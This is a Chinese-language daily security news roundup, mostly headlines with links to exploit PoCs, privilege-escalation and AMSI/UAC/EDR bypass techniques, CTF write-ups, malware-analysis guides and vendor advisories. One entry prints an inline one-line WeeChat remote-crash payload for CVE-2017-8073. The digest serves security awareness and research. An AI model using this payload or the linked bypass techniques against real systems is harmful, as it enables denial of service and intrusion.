【知识】5月2日 - 每日安全知识热点

热点概要：WordPress Core -RCE PoC Exploit (video) 无需插件和认证、Android应用逆向101、Windows提权思路总结、英特尔®AMT，英特尔®SBA或支持英特尔®ISM功能的系统存在权限提升漏洞、Apple iOS 10.3控制面板拒绝服务漏洞、上周jenkins修的反序列化RCE的漏洞细节和POC、恶意样本分析手册——工具篇、UAC bypass的研究总结、Mehdi Talbi & Paul Fariello – VM escape – QEMU Case Study

国内热词(以下内容部分摘自http://www.solidot.org/)：

---

WordPress Core被爆远程代码执行

在未能敲诈 Netflix 后黑客公开尚未上映的剧集

英国破解恐怖袭击枪手的加密 WhatsApp 信息

俄罗斯电信公司劫持金融服务的网络流量

资讯类：

---

Apple撤销OSX / Dok恶意软件使用的证书

https://threatpost.com/apple-revokes-certificate-used-by-osxdok-malware/125322/

因为Netflix没有支付赎金，黑客威胁泄漏更多的节目

http://thehackernews.com/2017/04/Orange-is-the-new-black-season-5-episodes.html

技术类：

---

WordPress Core -RCE PoC Exploit (video) 无需插件和认证

https://youtu.be/ZFt_S5pQPX0

比较“81端口的botnet”和 MIRAI 之间的联系

http://blog.netlab.360.com/the_difference_between_http81_botnet_and_mirai/

Android应用逆向101

https://www.evilsocket.net/2017/04/27/Android-Applications-Reversing-101/

内网安全——利用NSA Smbtouch批量检测内网

https://3gstudent.github.io/3gstudent.github.io/%E5%86%85%E7%BD%91%E5%AE%89%E5%85%A8-%E5%88%A9%E7%94%A8NSA-Smbtouch%E6%89%B9%E9%87%8F%E6%A3%80%E6%B5%8B%E5%86%85%E7%BD%91/

Mehdi Talbi & Paul Fariello – VM escape – QEMU Case Study

http://www.phrack.org/papers/vm-escape-qemu-case-study.html

Windows提权思路总结

http://blog.mokirin.com/2017/04/27/windows%E6%8F%90%E6%9D%83%E6%80%9D%E8%B7%AF%E6%80%BB%E7%BB%93/

绕过ios锁屏漏洞的总结

http://blog.dinosec.com/2014/09/bypassing-ios-lock-screens.html

编写高质量的Windows Shellcode

https://dimitrifourny.github.io/2017/04/28/optimized-windows-shellcode/

CVE-2017-8073 POC ：WeeChat 1.7.1之前远程crash

/exec -o /bin/echo -e "x01DCC SEND " 1.2.3.4 1337 1×01

雅虎为 Flickr 账户劫持漏洞（三处漏洞结合使用）支付7000刀

http://blog.mish.re/index.php/2017/04/29/yahoo-bug-bounty-chaining-3-minor-issues-to-takeover-flickr-accounts/

Apple iOS 10.3控制面板拒绝服务漏洞

https://www.vulnerability-lab.com/get_content.php?id=2059

十五种方式打破RSA的安全性

https://github.com/comaeio/OPCDE/blob/master/15_ways_to_break_RSA_Security/opcde2017-ds-lifchitz-break_rsa.pdf

UAC bypass的研究总结

https://www.peerlyst.com/posts/wiki-uac-bypasses-and-uac-bypass-research-nic-cancellari

利用.NET管理DCOM对象模型

https://googleprojectzero.blogspot.in/2017/04/exploiting-net-managed-dcom.html

英特尔®AMT，英特尔®SBA或支持英特尔®ISM功能的系统存在权限提升漏洞

https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr

defcon 2017 liberty writeup

https://github.com/deroko/liberty

一个漏洞信息检索网站

https://vulners.com/

如何使用Nmap与Meterpreter双剑合璧

http://www.blackhillsinfosec.com/?p=5897

上周jenkins修的反序列化RCE的漏洞细节和POC

https://blogs.securiteam.com/index.php/archives/3171

2017年5月 Android安全公告

https://source.android.com/security/bulletin/2017-05-01

UIUCTF 2017 – ZippyPic Writeup

https://jbzteam.github.io/web/UIUC2017-ZippyPics

AMSI bypass via COM hijacking

https://gist.githubusercontent.com/enigma0x3/00990303951942775ebb834d5502f1a6/raw/783a9b43f52f8f65f30edea707c79d9914b6f6f5/amsi_bypass.reg

在C中使用LoadLibrary进行DLL注入

https://arvanaghi.com/blog/dll-injection-using-loadlibrary-in-C/

Outlook：从表单到获取shell

https://sensepost.com/blog/2017/outlook-forms-and-shells/

Sanic Web框架任意文件读取漏洞分析

https://mp.weixin.qq.com/s?__biz=MzIxODIzNzgwMw==&mid=2654056186&idx=1&sn=ae10828fcc1a0308e2563367e709c85d

恶意样本分析手册——工具篇

http://blog.nsfocus.net/malicious-sample-analysis-manual-tool-1/ 

http://blog.nsfocus.net/malicious-sample-analysis-manual-tool-2/

HookCase是一个用于在MacOS上进行调试和逆向工程应用的工具

https://github.com/steven-michaud/HookCase

Running programs via Proxy & jumping on a EDR-bypass trampoline

http://www.hexacorn.com/blog/2017/05/01/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline/

绕过Windows附件管理器

http://www.rvrsh3ll.net/blog/informational/bypassing-windows-attachment-manager/

DEFCON CTF QUALIFIERS 2017 – Crackme 2000

https://github.com/sinfocol/ctfs/tree/master/writeups/2017/defcon-qualifiers/crackme-2000

leakbase.pw泄漏的访问日志

http://siph0n.net/exploits.php?id=4976

在Metasploit中远程利用Eternalblue和Dualpulsar Exploit

http://www.hackingarticles.in/exploit-remote-windows-pc-eternalblue-doublepulsar-exploit-metasploit/